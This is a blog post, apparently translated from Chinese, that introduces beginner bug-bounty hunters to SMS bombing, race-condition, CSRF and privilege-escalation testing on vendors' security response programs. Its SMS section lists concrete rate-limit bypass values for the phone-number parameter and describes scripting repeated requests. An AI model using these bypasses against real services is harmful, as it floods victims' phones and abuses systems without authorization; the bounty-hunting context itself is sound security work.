banner
言心吾

言心吾のBlog

吾言为心声

How Beginners of SRC Mining Can Quickly Find Their First Vulnerability (Part 1)

As a beginner, how to quickly submit the first valid vulnerability in SRC (Security Response Center) and earn a bounty is a concern for many newcomers. This article will recommend several common and relatively easy-to-exploit vulnerability types, and provide detailed exploration ideas and methods to help you get started quickly. As the saying goes, "Unable to find high-risk vulnerabilities, make do with low-risk ones."

SMS Bombing Vulnerability#

What is an SMS bombing vulnerability?#

An SMS bombing vulnerability refers to attackers using the SMS interface of certain platforms or services to send a large number of repetitive or junk messages to the victim's mobile phone, causing the victim's phone to be flooded with messages and even rendering it unusable.

How to exploit an SMS bombing vulnerability?#

  1. Target selection: Choose websites that provide SMS verification services, such as registration, login, password recovery, etc.
  2. Interface analysis: Analyze the requests and responses of the SMS interface using a packet capture tool (such as Burp Suite) to identify the API for sending SMS messages.
  3. Send tests: Attempt to send multiple SMS messages and observe if there are any restrictions on the frequency or quantity of messages.

When reviewing the SMS bombing, I feel that it is best not to start with concurrency, as it may result in phone number blocking. It is better to bypass it first.

Bypass techniques#

  1. Bypass by adding spaces, 86, 086, 0086, +86, 0, 00, /r, /n, and special characters before and after the phone number parameter.

%20 +86 187111111
1871111%20 1871111 1871111\n
phone=1871111,1871111,187
phone=18711&phone=187111

  1. Modify cookies, variables, returns.
  2. 138888888889, 12 digits, take the first 11 digits through the SMS gateway, causing SMS bombing.
  3. Use encodings that can be parsed, such as URL encoding, to bypass.

Here is a real case:

image
Then write a dictionary to send multiple packets, and successfully receive multiple verification codes.
image

Concurrency Vulnerability#

What is a concurrency vulnerability?#

A concurrency vulnerability refers to a situation where a system fails to handle concurrency correctly when processing multiple simultaneous requests, resulting in data inconsistency or system abnormalities.

How to exploit a concurrency vulnerability?#

Everything can be concurrent.

The main test scenarios for concurrency include signing in, earning points every day, liking, liking comments, etc., to test whether the server can respond to multiple requests.

If you want to increase the severity of a concurrency vulnerability, you must link it to money or make the vendor feel that it can be exploited to achieve the effect of taking advantage of the system. At this point, your concurrency vulnerability can earn a high bounty.

Burpsuite Turbo Intruder plugin (the god of concurrency)
Please search the specific usage methods on the internet.

CSRF (Cross-Site Request Forgery)#

What is a CSRF vulnerability?#

A CSRF vulnerability refers to attackers forging user requests to induce users to unknowingly perform unexpected operations while authenticated.

How to exploit a CSRF vulnerability?#

  1. Find critical operations: Choose operations that require user authentication, such as changing passwords, submitting forms, etc.
  2. Construct malicious requests: Construct an HTML form or script that contains malicious operations and inadvertently induce users to click.
  3. Verify the vulnerability: Access the malicious link while logged in to verify if the expected operation can be executed.
  • CSRF PoC Generator in Burp Suite

Privilege Escalation Vulnerability#

What is a privilege escalation vulnerability?#

A privilege escalation vulnerability refers to ordinary users executing operations that can only be performed by administrators or other privileged users without the corresponding permissions.

How to exploit a privilege escalation vulnerability?#

  1. Analyze privilege control: Understand the privilege control mechanism in the system and identify the differences in permissions between different roles.
  2. Simulate low privilege users: Use the identity of a low privilege user to attempt to access high privilege functions or resources.
  3. Manual and automated testing: Manually modify parameters in requests, such as user IDs and role IDs, to verify if unauthorized access is possible.
  • xia_yue plugin in Burp Suite

Conclusion#

By mastering the exploration techniques for common vulnerabilities such as SMS bombing, concurrency, CSRF, and privilege escalation, beginners can find their first vulnerability more quickly. In the actual exploration process, in addition to theoretical knowledge, a lot of practice and continuous experience summarization are also required. I hope this article is helpful to you and wish you success in your exploration journey in SRC!

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.